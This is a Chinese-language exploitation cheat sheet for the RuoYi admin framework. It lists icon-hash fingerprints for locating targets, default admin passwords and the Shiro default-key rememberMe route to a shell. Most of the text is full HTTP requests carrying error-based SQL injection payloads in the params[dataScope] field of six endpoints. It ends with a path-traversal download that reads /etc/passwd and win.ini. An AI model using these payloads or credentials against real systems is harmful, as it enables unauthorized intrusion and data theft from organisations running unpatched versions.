0x01 特征
绿若依
icon_hash=”706913071”
蓝若依
icon_hash=” -1231872293”
0x02 漏洞
弱口令
用户:admin ruoyi druid
密码:123456 admin druid admin123 admin888若依前台默认shiro key命令执行漏洞
若依默认使用shiro组件,所以可以试试shiro经典的rememberMe漏洞来getshell。
影响版本
RuoYi<V-4.6.2
密钥存放位置
默认密钥
RuoYi-4.6.2版本开始就使用随机密钥的方式,而不使用固定密钥,若要使用固定密钥需要开发者自己指定密钥,因此4.6.2版本以后,在没有获取到密钥的请情况下无法再进行利用。
RuoYi-4.2版本使用的是shiro-1.4.2在该版本和该版本之后都需要勾选AES GCM模式。
SQL注入
- /system/role/list接口(<V-4.6.2)
接口
POC
POST /system/role/list HTTP/1.1
Host:
Content-Length: 200
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=ddbcb9ac-2a67-46a4-88d8-fbf6a00d53fc
Connection: keep-alivepageSize=10&pageNum=1&orderByColumn=roleSort&isAsc=asc&roleName=&roleKey=&status=¶ms%5BbeginTime%5D=¶ms%5BendTime%5D=¶ms[dataScope]=and extractvalue(1,concat(0x7e,(select version()),0x7e))
- /system/role/export (<V-4.6.2)
POC
POST /system/role/export HTTP/1.1
Host:
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))
- /system/user/list (<V-4.6.2)
POC
POST /system/user/list HTTP/1.1
Host:
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))
- /system/dept/list (<V-4.6.2)
POC
POST /system/dept/list HTTP/1.1
Host:
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))
- /role/authUser/allocatedList (<V-4.6.2)
POC
POST /system/role/authUser/allocatedList HTTP/1.1
Host:
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))
- /role/authUser/unallocatedList
POC
POST /system/role/authUser/unallocatedList HTTP/1.1
Host:
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))
CNVD-2021-01931任意文件下载
影响版本
RuoYi<4.5.1
路径
/common/download/resource
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini
